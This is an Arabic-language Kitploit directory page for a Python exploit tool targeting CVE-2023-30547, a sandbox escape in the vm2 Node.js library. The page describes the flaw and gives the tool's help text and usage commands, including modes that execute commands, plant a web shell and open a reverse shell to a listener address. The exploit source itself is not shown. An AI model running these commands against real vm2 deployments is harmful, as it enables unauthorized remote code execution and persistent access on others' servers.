Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-30547 — أداة لاستكشاف CVE-2023-30547 | Kitploit
أدوات/GitHubGitHub/cur1iosity/cve-2023-30547
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubcur1iosity/cve-2023-30547

CVE-2023-30547

أداة لاستكشاف CVE-2023-30547

عرض المستودع
1منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-30547

عرض توضيحي

وصف الثغرة

vm2 هو صندوق رمل يمكنه تشغيل كود غير موثوق به مع وحدات Node المدمجة المدرجة في القائمة البيضاء. توجد ثغرة في تنقية الاستثناءات في vm2 للإصدارات حتى 3.9.16، مما يسمح للمهاجمين بإثارة استثناء مضيف غير منقى داخل handleException() والذي يمكن استخدامه للهروب من الصندوق الرمل وتشغيل كود عشوائي في سياق المضيف.

CVE-2023-30547.py

هذه الأداة هي نص برمجي بسيط بلغة بايثون يمكن استخدامه لاستكشاف الثغرة. لديها 4 أوضاع:

  • check: يتحقق مما إذا كان الهدف ضعيفًا.
  • command_execution_execution: ينفذ أمرًا على الهدف.
  • web_shell: يفتح ويب شيل على الهدف.
  • reverse_shell: يفتح ريفيرس شيل على الهدف.

المساعدة

root@kitploit:~
usage: CVE-2023-30547.py [-h] -m {check,command_execution,web_shell,reverse_shell} -t TARGET [-c COMMAND] [-p PORT] [-i IP]

Tool for exploring CVE-2023-30547. 

options:
  -h, --help            show this help message and exit
  -m {check,command_execution,web_shell,reverse_shell}, --mode {check,command_execution,web_shell,reverse_shell}
                        Mode to run the tool in.
  -t TARGET, --target TARGET
                        Target to run the tool against.
  -c COMMAND, --command COMMAND
                        Command to execute in exploit mode.
  -p PORT, --port PORT  Local port to use for reverse shell.
  -i IP, --ip IP        Local ip to use for reverse shell.

الاستخدام

root@kitploit:~
python3 CVE-2023-30547.py -m check -t http://url.com/run
python3 CVE-2023-30547.py -m reverse_shell -t domain.com/run -p 1234 -i 10.10.10.10
python3 CVE-2023-30547.py -m web_shell -t domain.com/run
python3 CVE-2023-30547.py -m command_execution -t domain.com -c 'whoami'

المراجع:

  • https://gist.github.com/leesh3288/381b230b04936dd4d74aaf90cc8bb244
  • https://nvd.nist.gov/vuln/detail/CVE-2023-30547
تنزيل الأداة